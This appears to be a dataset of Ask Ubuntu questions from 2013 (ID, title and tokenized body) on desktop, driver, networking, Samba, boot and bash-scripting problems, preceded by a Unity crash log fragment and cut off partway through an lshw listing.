2013-09-27 00:52:55 unity.glib.dbus.server glibdbusserver.cpp:580 ca n't register object 'com.canonical.autopilot.introspection ' yet as we do n't have a connection , waiting for it ... warn 2013-09-27 00:52:55 unity.glib.dbus.server glibdbusserver.cpp:580 ca n't register object 'com.canonical.unity.debug.logging ' yet as we do n't have a connection , waiting for it ... xlib : extension `` xinerama '' missing on display `` :0 '' . xlib : extension `` xinerama '' missing on display `` :0 '' . warn 2013-09-27 00:52:55 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-writer.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-09-27 00:52:55 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-calc.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-09-27 00:52:55 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-impress.desktop ' is using a deprecated format for its actions that will be dropped soon . error 2013-09-27 00:52:55 unity.glib-gio < unknown > :0 g_file_monitor_set_rate_limit : assertion `g_is_file_monitor ( monitor ) ' failed error 2013-09-27 00:52:55 unity.launcher.icon.trash trashlaunchericon.cpp:62 could not create file monitor for trash uri : operation not supported warn 2013-09-27 00:52:55 unity.glib.dbus.server glibdbusserver.cpp:580 ca n't register object 'com.canonical.unity.launcher ' yet as we do n't have a connection , waiting for it ... xlib : extension `` xinerama '' missing on display `` :0 '' . warn 2013-09-27 00:52:55 unity.glib.dbus.server glibdbusserver.cpp:580 ca n't register object 'com.canonical.unity.dash ' yet as we do n't have a connection , waiting for it ... warn 2013-09-27 00:52:55 unity.glib-gobject < unknown > :0 invalid ( null ) pointer instance error 2013-09-27 00:52:55 unity.glib-gobject < unknown > :0 g_signal_handlers_disconnect_matched : assertion `g_type_check_instance ( instance ) ' failed warn 2013-09-27 00:52:55 unity.glib-gobject < unknown > :0 invalid ( null ) pointer instance error 2013-09-27 00:52:55 unity.glib-gobject < unknown > :0 g_signal_connect_data : assertion `g_type_check_instance ( instance ) ' failed ** ibus : error : ibusconfig.c:237 : ibus_config_get_value : assertion failed : ( ibus_is_config ( config ) ) aborted ( core dumped ) warning : no display variable set , setting it to :0
350626	what does uninstall-wubi.exe do ?	what does uninstall-wubi.exe do ? does it uninstall just wubi or complete ubuntu ? i installed ubuntu 12.04 in windows 7 and now have windows 8 in place of windows 7 and i want a fresh copy of ubuntu 12.04
350628	dual boot with two different hdds ?	have two hdds , one with windows 8 installed on it , and one with ubuntu 12.10 installed on it . seeing as ubuntu is not installed alongside windows , i can only assume that windows does n't even see ubuntu . my problem is that , i want to be able to select a device to boot from a bios menu . i know that windows boot manager will not work and my bios keeps giving me the only option of selecting a `` boot first device '' , which sequentially changes the boot priority via the bios permanently unless i change it back . ultimately i want to be able to have a choice when i turn on my computer , but am not given that option . my motherboard specs are as follows : motherboard : gigabyte z68xp-ud3 ( intel socket 1155 ) bios : award software international , inc. ( version 8 ) any ideas ? without having to change wires every time i wanted to load a different operating system ? or how to have a selection every time my computer is turned on , without changing the boot sequence ? thank you so much ! aaron
350630	laptop display settings change when i plug the laptop in	my laptop behaves annoyingly when i 'm using another display ( laptop screen + another monitor , so in total two displays ) with it . if i first connect the other monitor , and then the power cable , ubuntu mirrors the two screens . also , if i disconnect the second display , any applications whose windows where on the second screen are `` left there '' , i.e . if i click their icon on the launcher they become active , but i can not see them . they are returned to the laptop screen only when i unplug my laptop . my laptop is hp 635 and i 'm using ubuntu 12.04 lts . i would like that the display settings do not change in any way whether my laptop is plugged in or not .
350633	what is dconf and gvfs folders ?	i recently installed samba but now i see the following files off my home directory that are permissioned by root . both folders are empty . can i remove them ? i am not sure if this is related or not to samba or whether it is safe to nix these . find : `./.cache/dconf ' : permission denied find : `./.gvfs ' : permission denied
350636	eth0 rx and tx in `` terabyte '' ?	this is my `` ifconfig '' output : just look at the eth0 part and please tell me what is the deal ? eth0 link encap : ethernet hwaddr c8:0a : a9:34:65:77 up broadcast multicast mtu:1500 metric:1 rx packets:478089989475630 errors:2868552821755665 dropped:956188568885850 overruns:478094284442925 frame:2390462832280035 tx packets:478094284442925 errors:1912377137771700 dropped:0 overruns:478094284442925 carrier:956188568885850 collisions:2390471422214625 txqueuelen:1000 rx bytes:478089989475630 ( 478.0 tb ) tx bytes:478094284442925 ( 478.0 tb ) yeah sure : ) ) sry ! it 's a home computer ( laptop ) , i shutdown it usually , so it has n't been up for a long time . 12 hours maximum . i 'm always connected to internet but not with eth0 but using wlan0 . nothing happens when i restart and the counter is still the same . the manufacturer is qualcomm atheros and my system runs ubuntu x64 .
350643	nexus 7 ( 2013 ) slow usb transfer , messy file browsing	working with ubuntu 13.04 , connecting my nexus 7 ( 2nd gen , 2013 ) via mtp works fine . i just connect the nexus 7 and nautilus immediately opens up in the correct directory . no more need to fiddle around with third-party tools as suggested here . there are two issues that are really bugging me , though : transferring files via usb is really slow . i am using usb 3.0 but nautilus says my transfer rate is fixed at about 1mb/s which is way too slow for usb 3.0 . this might be a problem of calculating the correct transfer rate but i can tell you that the transfer speed is nowhere near the full potential of usb 3.0 navigating files on the nexus 7 is quirky . this might be an mtp issue but it just feels odd . if i create a new directory on my nexus 7 via nautilus , i need to `` refresh '' the current directory ( i.e . move to the parent directory and enter the subdirectory again ) so that the newly created directory becomes visible for me . my usb works fine using other devices such as flash drives and usb hdds . i have n't found any advice on these problems yet and i 'm not sure whether this affects others as well .
350645	if i close a terminal does it kill the processes inside of it ?	if i am in the middle of using the terminal , say to apt-get something ; if i click the x / close button , does the terminal continue to run in the background ? to afraid to try it , cause i do n't want to have to start the process all over again ... has anyone accidentally done it ?
350646	how can access ubuntu shared folder in windows 7 or xp ?	windows 7 has two users that can each see different folders . i want to access my ubuntu shared folder from windows xp and windows 7 with limited access . for example , i would like it so that : user 1 can see folders a and b user 2 can see folders b and c is this possible ?
350649	how to make sure a 3 character filename contains one of 2 characters ?	so i have to search a directory for files that are of 3 character length . that is easy , the problem is that at least 1 of the 3 characters needs to be either a `` b '' or a `` y '' . i know that [ by ] would make sure the character is either a b or a y , however simply doing [ by ] [ by ] [ by ] would not suffice since it is not a requirement for all 3 characters to be either b or y ; only 1 of them has to be . please help .
350652	can i have a live matrix wallpaper on ubuntu 13.04 ? how ?	i searched the web and found there is a live wallpaper option but it may only work for 12.04 , and only has three options . i want a live matrix wallpaper on my ubuntu13.04 . is this possible ? if so how ? thanks for the help ! i 'd really love this customization !
350655	totem installing issue	i have downloaded the latest totem_3.8.2.orig.tar.xz but how do i go about installing it . i do n't have the faintest idea of linux so anything would be helpful . when i have tried installing the application , i am asked what application do i want to open the file with . unknowingly , i had selected a registry file since there were n't any default files . obviously , it did n't quite do the trick . am totally lost here . any help would be appreciated
350657	lxc-start : failed to spawn	i tried following the steps to create and start an lxc container from here : https : //help.ubuntu.com/lts/serverguide/lxc.html my host is running an up to date 64-bit precise ( 12.04 ) , and i 'm trying to start a precise containers . i created the container like this : sudo lxc-create -t ubuntu -n precise -- -r precise and it seemed to complete succesfully . when i try and start , i get : $ sudo lxc-start -n precise lxc-start : failed to spawn 'precise' and kern.log says : sep 27 09:27:15 hans kernel : [ 3738467.397433 ] device vethrtjyfo entered promiscuous mode sep 27 09:27:15 hans kernel : [ 3738467.399113 ] addrconf ( netdev_up ) : vethrtjyfo : link is not ready sep 27 09:27:15 hans kernel : [ 3738467.409192 ] init : failed to spawn network-interface ( vethlndnfp ) pre-start process : unable to change root directory : no such file or directory sep 27 09:27:15 hans kernel : [ 3738467.412190 ] init : failed to spawn network-interface-security ( network-interface/vethlndnfp ) pre-start process : unable to change root directory : no such file or directory sep 27 09:27:15 hans kernel : [ 3738467.413059 ] init : failed to spawn network-interface ( vethlndnfp ) post-stop process : unable to change root directory : no such file or directory sep 27 09:27:15 hans kernel : [ 3738467.417246 ] init : failed to spawn network-interface ( vethrtjyfo ) pre-start process : unable to change root directory : no such file or directory sep 27 09:27:15 hans kernel : [ 3738467.419247 ] init : failed to spawn network-interface-security ( network-interface/vethrtjyfo ) pre-start process : unable to change root directory : no such file or directory sep 27 09:27:15 hans kernel : [ 3738467.420327 ] init : failed to spawn network-interface ( vethrtjyfo ) post-stop process : unable to change root directory : no such file or directory
350658	ca n't install testdisk with universal repository	i 'm new to testdisk command and would like to install testdisk the problem i encounter is that i 've enable universal repository in software center - > edit - > software sources but i could n't still install testdisk . ubuntu @ ubuntu : ~ $ sudo apt-get install testdisk reading package lists ... done building dependency tree reading state information ... done e : unable to locate package testdisk this is what i got on my terminal with the universal repository ticked . please tell me my mistakes .
350660	ubuntu not displaying `` dash home '' ui ?	i 've just switched over to ubuntu . this is the very first time i 've used any os other than windows or mac so it 's very much a learning curve for me . i 'm using 12.04.3 lts and i have it up and running but i have a small issue . my dash home button ( which i assume is the ubuntu version of the start button ) does not display any of its ui , background or icons . all that happens is the bar running across the top of the screen displays the close , minimise and maximise buttons and the background flashes , but that 's pretty much it . the window does open and the icons are there ( i know this because i randomly clicked in the window and all my programs opened ) . it 's just they are completely transparent i 've tried resetting the launcher icons , but that just replaced my buttons with the default ones . the rest of the os is running perfectly stable however . any help is greatly appreciated as i said ; i 'm very new at this , i only installed ubuntu 5 hours ago .
350663	can someone help me port a gameboy emulator to ubuntu touch ?	how can i translate a qt ( c++ ) gameboy emulator to a qml ubuntu touch emulator ? any suggestions would be much appreciated ...
350664	how can i make alt not minimize games ?	every time i press alt when playing a game , it minimizes . i tried different options in the keyboard preferences and changing button1 to button1 in the configuration editor app , but neither solved my problem . any advice is welcomed !
350667	dropbox ignoring my default programs	i 'm currently using ubuntu 13.04 . dropbox , for some reason , is ignoring my default file manager and browser . whenever i open the folder `` dropbox '' , it uses nautilus and not thunar ( which is my default file manager.. or so i thought ? ) . on top of that , whenever i click on `` launch dropbox website '' , it does that by opening firefox , and not chromium ( which is my default ) does anyone have any idea why this is happening and how to fix it ? edit : it seems that every folder on my desktop is opening with nautilus . i made thunar my default application by going to exo-preferred-applications and choosing thunar . perhaps that 's not enough ?
350668	how to resolve bootloader problem in ubuntu 13.04 ?	yesterday , i did something that damaged the bootloader of my ubuntu 13.04 . then i had to install lubuntu 13.04 , and i 'm now using the grub of lubuntu . the problem is in the opening screen ubuntu gives the following error : /boot/efi not present or ready again , i ca n't browse the internet in that computer ( my connection is manual static ip ) . it says : name resolution failed i have n't installed anything in lubuntu , so no software is causing this problem . however i can connect to internet using another laptop . so how do fix this error ?
350670	switching from mpich2 to openmpi ( while having both installed ) ?	currently , i have mpich2 installed on cluster of 5 computers which run ubuntu 13.04 . i would like to install openmpi as well and do a bit of comparison on performance . however , how can i keep both mpich2 and openmpi on a single system ? how will i able to switch from one to another ?
350671	logitech c615 ubuntu 12.10 problem	i have problem with display . video always smudging , there are these floating stripes . this problem occurs on ubuntu 12.10 and 13.04 . i tried all various settings with guvcview and nothing helps . i made a video http : //youtu.be/j921won_2kg
350675	getting a siocsifflags : operation not permitted	hello i am totally new to this stuff . i am getting a siocsifflags : operation not permitted error when i try to ifconfig wlan0 up . here are the before and after from my terminal . root @ bt : ~ # iwconfig lo no wireless extensions . wlan0 unassociated nickname : '' rtl_wifi '' mode : auto access point : not-associated sensitivity:0/0 retry : off rts thr : off fragment thr : off encryption key : off power management : off link quality:0 signal level:0 noise level:0 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 eth0 no wireless extensions . root @ bt : ~ # ifconfig eth0 link encap : ethernet hwaddr 00:0c:29:4b:5c : be inet addr:192.168.196.130 bcast:192.168.196.255 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : fe4b:5cbe/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:124 errors:0 dropped:0 overruns:0 frame:0 tx packets:38 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:11915 ( 11.9 kb ) tx bytes:3200 ( 3.2 kb ) interrupt:19 base address:0x2000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:15 errors:0 dropped:0 overruns:0 frame:0 tx packets:15 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:953 ( 953.0 b ) tx bytes:953 ( 953.0 b ) wlan0 link encap : ethernet hwaddr 00:02:72:3b : fe:45 up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) root @ bt : ~ # iwlist scan lo interface does n't support scanning . wlan0 scan completed : cell 01 - address : 00:0d:97:07 : e5:6e essid : '' < hidden > '' protocol : ieee 802.11bg mode : master frequency:2.412 ghz ( channel 1 ) encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s ; 36 mb/s 48 mb/s ; 54 mb/s extra : wpa_ie=dd1a0050f20101000050f20202000050f2020050f20401000050f202 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk extra : rsn_ie=30180100000fac020200000fac02000fac040100000fac020000 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : psk signal level=42/100 cell 02 - address : c0:3f:0e:94:00 : de essid : '' kenpoaksds '' protocol : ieee 802.11bgn mode : master frequency:2.437 ghz ( channel 6 ) encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s ; 6 mb/s ; 9 mb/s 12 mb/s ; 48 mb/s extra : rsn_ie=30140100000fac040100000fac040100000fac020c00 ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : dd0e0050f204104a0001101044000102 signal level=43/100 cell 03 - address : 28:28:5d:20:78:39 essid : '' fuji '' protocol : ieee 802.11bgn mode : master frequency:2.452 ghz ( channel 9 ) encryption key : on bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s ; 6 mb/s ; 9 mb/s 12 mb/s ; 48 mb/s extra : wpa_ie=dd1c0050f20101000050f20202000050f2040050f20201000050f2020c00 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk extra : rsn_ie=30180100000fac020200000fac04000fac020100000fac020c00 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : dd180050f204104a00011010440001021049000600372a000120 signal level=47/100 eth0 interface does n't support scanning . root @ bt : ~ # dmesg | tail [ 19.394752 ] acpiphp : slot [ 62 ] registered [ 19.394846 ] acpiphp : slot [ 63 ] registered [ 22.658036 ] eth0 : no ipv6 routers present [ 23.280799 ] r8712u : customerid = 0x0000 [ 23.280807 ] r8712u : mac address from efuse = 00:02:72:3b : fe:45 [ 23.280812 ] r8712u : loading firmware from `` rtlwifi/rtl8712u.bin '' [ 23.281497 ] usbcore : registered new interface driver r8712u [ 25.325874 ] r8712u : 1 rcr=0x153f00e [ 25.330997 ] r8712u : 2 rcr=0x553f00e [ 25.471834 ] addrconf ( netdev_up ) : wlan0 : link is not ready root @ bt : ~ # cd /usr/src/linux & & cat .config | grep =i kill grep : kill : no such file or directory root @ bt : /usr/src/linux # ifconfig wlan0 down root @ bt : /usr/src/linux # macchanger -m 00:11:22:33:44:55 wlan0 current mac : 00:02:72:3b : fe:45 ( cc & c technologies , inc. ) faked mac : 00:11:22:33:44:55 ( cimsys inc ) root @ bt : /usr/src/linux # ifconfig wlan0 up siocsifflags : operation not permitted root @ bt : /usr/src/linux # iwconfig lo no wireless extensions . wlan0 unassociated nickname : '' rtl_wifi '' mode : auto access point : not-associated sensitivity:0/0 retry : off rts thr : off fragment thr : off encryption key : off power management : off link quality:0 signal level:0 noise level:0 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 eth0 no wireless extensions . root @ bt : /usr/src/linux # ifconfig eth0 link encap : ethernet hwaddr 00:0c:29:4b:5c : be inet addr:192.168.196.130 bcast:192.168.196.255 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : fe4b:5cbe/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:254 errors:0 dropped:0 overruns:0 frame:0 tx packets:39 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:23547 ( 23.5 kb ) tx bytes:3242 ( 3.2 kb ) interrupt:19 base address:0x2000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:23 errors:0 dropped:0 overruns:0 frame:0 tx packets:23 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1521 ( 1.5 kb ) tx bytes:1521 ( 1.5 kb ) root @ bt : /usr/src/linux # iwlist scan lo interface does n't support scanning . wlan0 interface does n't support scanning : network is down eth0 interface does n't support scanning . root @ bt : /usr/src/linux # dmesg | tail [ 19.394752 ] acpiphp : slot [ 62 ] registered [ 19.394846 ] acpiphp : slot [ 63 ] registered [ 22.658036 ] eth0 : no ipv6 routers present [ 23.280799 ] r8712u : customerid = 0x0000 [ 23.280807 ] r8712u : mac address from efuse = 00:02:72:3b : fe:45 [ 23.280812 ] r8712u : loading firmware from `` rtlwifi/rtl8712u.bin '' [ 23.281497 ] usbcore : registered new interface driver r8712u [ 25.325874 ] r8712u : 1 rcr=0x153f00e [ 25.330997 ] r8712u : 2 rcr=0x553f00e [ 25.471834 ] addrconf ( netdev_up ) : wlan0 : link is not ready root @ bt : /usr/src/linux # cd /usr/src/linux & & cat .config | grep =i kill grep : kill : no such file or directory root @ bt : /usr/src/linux #
350677	lan share folder and enclosed folders	as a no-programmer we are having the following problem . i 've shared and set permissions on folders with groups . everything works as a charm except we ca n't see the content of the underlying folders ( folder # 1 > folder # 1.1 > files ) . does anyone know how we can show all underlying folders as well ?
350679	get system locale language code in bash for a dynamic path	here is my bash-file : # ! /bin/bash pathtoparentdir= '' $ ( cd `` $ ( dirname `` $ { bash_source [ 0 ] } '' ) '' & & pwd ) '' sudo linguist-qt4 $ pathtoparentdir/translate_de.ts what i need is that my bash script automatically detects the system language de and inserts that after translate_ . all i know is that i can type locale -abut that return too much words . i am totally new to bash ...
350680	samba share mac creating read only files	i am having a problem with a samba share file system . the file system will work normal on any windows computer . if create a file any other system `` included mac '' can view and edit it that file the problem is : when creating a file on a mac `` mac osx 10.5.8 '' the file show as read only and only the mac user that created that file can edit it if the file is opened by a windows device it will show as read-only the samba conf is : [ saviosilvatest ] path = /media/saviosilvatest writeable = yes browseable = yes guest ok = yes valid users = games , proxy , saviosilva create mask = 0777 directory mask = 0777 read only = no force create mode = 0777 force directory mode = 0777 thanks for your help
350681	how can i change the `` kernel driver in use '' ?	i 'm having a graphics card issue , by checking my fps with theglxgears test and it gave me around 60 fps which is way too low compared to my fps under windows 7 in the same laptop ( just switched to linux some days ago ; using 13.04 raring right now ) . so after some researching i found out my integrated graphics card version ( mobile intel 4 series chipset family ) ; and also managed to find out my driver ( i915 ) , which happened to have a newer version ( i965 ) . by installing and running intel 's new intel driver utility for linux systems i somehow solved the problem . at least that 's what i was thinking at first , because after checking with vainfo , it said driver version : intel i965 driver , but the lspci command gave me : kernel driver in use : i915 . doeas that mean the i965 driver is installed but not the default driver ? or this is not even a driver and i just got lost in the linux system ? even after this i did n't give up , i tried to remove the driver with removing commands such as rmmod -i915 and modprobe -r i915 but the terminal said the module i915 is in use therefore it ca n't be removed ; and also tried to install the newer driver version , but i did n't even find the correct driver installer . the installer should be a .ko ( kernel object ) file ?
350683	how to increase the font and icon in ubuntu and in the installed software ?	i am buying a 15 ' notebook with full hd resolution but the icon and the text are too litle for me can i change these value ? and for the text inside the installed programs ( menu programs , etc ) ? is it possible ? tnx andrea
350686	how to rename multiple files	i have hundreds of images which i want to rename : current name a0619101 . rename to a1906101 current name a0825223 . rename to a2508223 actually the first and second digits must become third and fourth . and the third and fourth digits must become first and second . could you help me ?
350687	does pyopencl require discrete graphics ?	when i try to install the package pyopencl , it pulls in nvidia stuff ( nvidia-current , i think ) . this appears to install without problems , but then messes up my opengl-related things . i thought a big part of the appeal of opencl is that it 's .. open , not tied to nvidia . is there a ( hopefully easy ) way to install and use pyopencl without pulling in nvidia stuff , or ( more importantly / precisely ) without breaking my opengl setup ? i realize that i 'll see little in the way of performance advantages of opencl this way , but i want it for development , anyway . running ubuntu 12.04 , intel 965gm integrated graphics .
350691	how to copy files to desktop for every language ?	my bash script should copy files from /opt/test/file.txt to the user 's desktop . the source path is always the same , but how do i copy to desktop ? the desktop has a different name in every language ... in german it is for example : cd $ home/arbeitsfl채che and not $ home/desktop
350692	xubuntu 13.04 x login loop	all of a sudden , i am no longer able to login to an x session in my xubuntu 13.04 install . the graphical login accepts my password , the screen goes blank and then returns to the login prompt . a bit of googling tells me that this is n't an uncommon problem , but all the advice i 've read so far has n't worked : i can login to the guest account , so the login manager is working . i can login to my account via tty or ssh , so my account is n't locked . i can start applications through an x tunnel ( xming+putty ) , if that 's relevant . there 's masses of disk space left . my ~/.xauthority is owned by me , rather than root . there 's no reference to ~/.iceauthority in my logs and the file is otherwise owned by me . /var/log/xorg.0.log looks ok ( ish ) : there are a few warnings about missing fonts and complaints about psb . apparently that 's the video driver ( my laptop uses intel gma500 ) and there are similar complaints later in the file , however it ultimately settles on something . after all , the display is clearly working at the login screen ( as it is for the guest account ) . there are some errors and permission complaints in ~/.xsession-errors , but i 'm not sure if they 're relevant : error : root : could not find any typelib for dbusmenu error : root : could not find any typelib for unity ... # # # ! ! ! [ parent ] [ rpcchannel ] error : channel error : can not send/recv ... debconf : dbdriver `` passwords '' warning : could not open /var/cache/debconf/passwords.dat : permission denied i tried dpkg-reconfigure xubuntu-desktop and apt-get -y install xubuntu-desktop to try refreshing/reinstalling , but neither option seemed to do anything . therefore , i 'm kind of at a loss ! so any ideas would be most appreciated !
350695	program interface is ugly when started by script	i am starting qt-linguist in a bash script via sudo linguist-qt4 $ pathtoparentdir/translate_ $ lang.ts i could also use gksu instead of sudo but this would add more dependencies since most people do n't have gksu installed . on the left picture you see how ugly it looks , it should look like on the right hand side when started normally . how can i start a program in a bash-script so that it looks like in the right picture ?
350701	switch keyboard layout on left control while pressed	i 'm using dworak , and i 'd like to switch to qwerty layout when i 'm using shortcuts ( like ctrl+c etc ) . the problem is that i press the shortcuts with my left hand ( e.g . left ctrl ) , and in ubuntu keyboard switching menu , the only combination which seems absent is left ctrl ( while pressed ) . i 've seen that it 's possible to change the settings with a command line , but apparently , i 'm not advanced enough to understand how to do it properly for the left ctrl . can anyone suggest to me how i can do it with setxkbmap or any other tool ? update this is not exactly what i wanted , but it answers my question : is there any way to use qwerty 's keyboard shortcut position while the dvorak layout is active ?
350702	/var/www - not parse php code	i added php file to /var/www/ but not working ( not parse php code ) : http : //site.com/a.php < ? php echo `` work '' ; ? > how to fix it ?
350710	ubuntu 12.04 with kernel 3.5.0-40 fails to boot	i 'm running ubuntu 12.04 on a dell e6230 with full disk encryption ( not just homedir ) as setup by the installer . in order to get the touchpad to be recognised and enable two finger scrolling i installed the linux-image-generic-lts-quantal package using apt which apparently has the required fix . the 3.5.0-40 kernel provided by that package does n't boot . i supply the passkey for the disk but the boot stops . the last line printed to the console with graphical boot disabled is : stopping save kernel messages how do i debug or fix this ? thanks ! the standard 3.2.0-53 kernel boots fine ( but i do n't have a fully usable trackpad ) .
350711	how use jasperserver in rails application	i am having problem in creating reports using jasperreport server . i gone through many sites , but i am not able not understand jasperserver with rails application.could any one provide me a detail information about jasperserver and also installation guide for jasperserver and jasperserver report generation in rails application.thanks for advance .
350715	kubuntu 12.04 cd/dvd drive no longer recognized	dear potential helpers , i have the following problem on a circa-2008 asus laptop with kubuntu 12.04.3 ( 3.2.0-39-generic-pae ) : after months of working fine , the cd/dvd drive is no longer recognized . when i insert a dvd or cd , it is neither listed in the devices widget nor in the places tab of dolphin . i guess this is not a hardware problem , since the drive is recognized in bios and i can boot from a live-cd . for a while , there was a 50 % chance of making it work by restarting the laptop with the dvd already in drive . but even this workaround does no longer work . i have done quite some research about this , but the other problem reports and solutions i could find were not helpful for my problem . it would be great if you could assist me . the following console outputs were made with a dvd inserted . sudo lshw output : description : notebook product : x51rl ( ) vendor : asustek computer inc. version : 1.0 serial : nf1s8448510135 width : 32 bits capabilities : smbios-2.4 dmi-2.4 smp-1.4 smp configuration : boot=normal chassis=notebook cpus=1 uuid=a42481dd-1acb-b0ed-2e00-001fc6879476 *-core description : motherboard product : x51rl vendor : asustek computer inc. physical id : 0 version : 1.0 serial : bsn12345678901234567 *-firmware description : bios vendor : american megatrends inc. physical id : 0 version : 204 date : 02/25/2008 size : 64kib capacity : 448kib capabilities : isa pci pcmcia pnp upgrade shadowing cdboot bootselect socketedrom edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer int10video acpi usb ls120boot zipboot biosbootspecification netboot *-cpu description : cpu product : intel ( r ) celeron ( r ) cpu 550 @ 2.00ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : 6.6.1 serial : 0001-0661-0000-0000-0000-0000 slot : socket 478 size : 2ghz width : 64 bits clock : 133mhz capabilities : boot fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss tm pbe nx x86-64 constant_tsc up arch_perfmon pebs bts aperfmperf pni dtes64 monitor ds_cpl tm2 ssse3 cx16 xtpr pdcm lahf_lm dtherm *-cache:0 description : l1 cache physical id : 5 slot : l1-cache size : 32kib capacity : 32kib capabilities : internal write-back data *-cache:1 description : l2 cache physical id : 6 slot : l2-cache size : 1mib capacity : 1mib capabilities : internal write-back unified *-memory description : system memory physical id : 19 slot : system board or motherboard size : 1gib capacity : 1gib *-bank:0 description : dimm ddr synchronous product : partnum0 vendor : manufacturer0 physical id : 0 serial : sernum0 slot : dimm0 size : 1gib width : 64 bits *-bank:1 description : dimm [ empty ] product : partnum1 vendor : manufacturer1 physical id : 1 serial : sernum1 slot : dimm1 *-pci description : host bridge product : advanced micro devices [ amd ] nee ati vendor : hynix semiconductor ( hyundai electronics ) physical id : 100 bus info : pci @ 0000:00:00.0 version : 01 width : 32 bits clock : 66mhz configuration : latency=64 *-pci:0 description : pci bridge product : rs480 pci bridge vendor : hynix semiconductor ( hyundai electronics ) physical id : 1 bus info : pci @ 0000:00:01.0 version : 00 width : 32 bits clock : 66mhz capabilities : pci normal_decode bus_master cap_list resources : ioport:7000 ( size=4096 ) memory : f8800000-f88fffff memory:8ff00000-afefffff *-display description : vga compatible controller product : rc410 [ radeon xpress 200m ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 5 bus info : pci @ 0000:01:05.0 version : 00 width : 32 bits clock : 66mhz capabilities : pm msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=64 mingnt=8 resources : irq:17 memory:90000000-9fffffff ioport:7800 ( size=256 ) memory : f88f0000-f88fffff memory : f88c0000-f88dffff *-pci:1 description : pci bridge product : rs480 pci bridge vendor : hynix semiconductor ( hyundai electronics ) physical id : 4 bus info : pci @ 0000:00:04.0 version : 00 width : 32 bits clock : 33mhz capabilities : pci pm pciexpress msi ht normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:0 memory : f8900000-f89fffff *-network disabled description : wireless interface product : ar242x / ar542x wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 00:15 : af:93:06:8f width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath5k driverversion=3.2.0-39-generic-pae firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bg resources : irq:16 memory : f89f0000-f89fffff *-pci:2 description : pci bridge product : rs480 pci bridge vendor : hynix semiconductor ( hyundai electronics ) physical id : 5 bus info : pci @ 0000:00:05.0 version : 00 width : 32 bits clock : 33mhz capabilities : pci pm pciexpress msi ht normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:0 ioport:8000 ( size=8192 ) memory : f8a00000-fc9fffff ioport : aff00000 ( size=536870912 ) *-pci:3 description : pci bridge product : rs480 pci bridge vendor : hynix semiconductor ( hyundai electronics ) physical id : 6 bus info : pci @ 0000:00:06.0 version : 00 width : 32 bits clock : 33mhz capabilities : pci pm pciexpress msi ht normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:0 *-pci:4 description : pci bridge product : rs480 pci bridge vendor : hynix semiconductor ( hyundai electronics ) physical id : 7 bus info : pci @ 0000:00:07.0 version : 00 width : 32 bits clock : 33mhz capabilities : pci pm pciexpress msi ht normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:0 *-storage description : sata controller product : sb600 non-raid-5 sata vendor : hynix semiconductor ( hyundai electronics ) physical id : 12 bus info : pci @ 0000:00:12.0 logical name : scsi0 version : 00 width : 32 bits clock : 66mhz capabilities : storage pm ahci_1.0 bus_master cap_list emulated configuration : driver=ahci latency=64 resources : irq:22 ioport : e800 ( size=8 ) ioport : e400 ( size=4 ) ioport : e000 ( size=8 ) ioport : dc00 ( size=4 ) ioport : d800 ( size=16 ) memory : 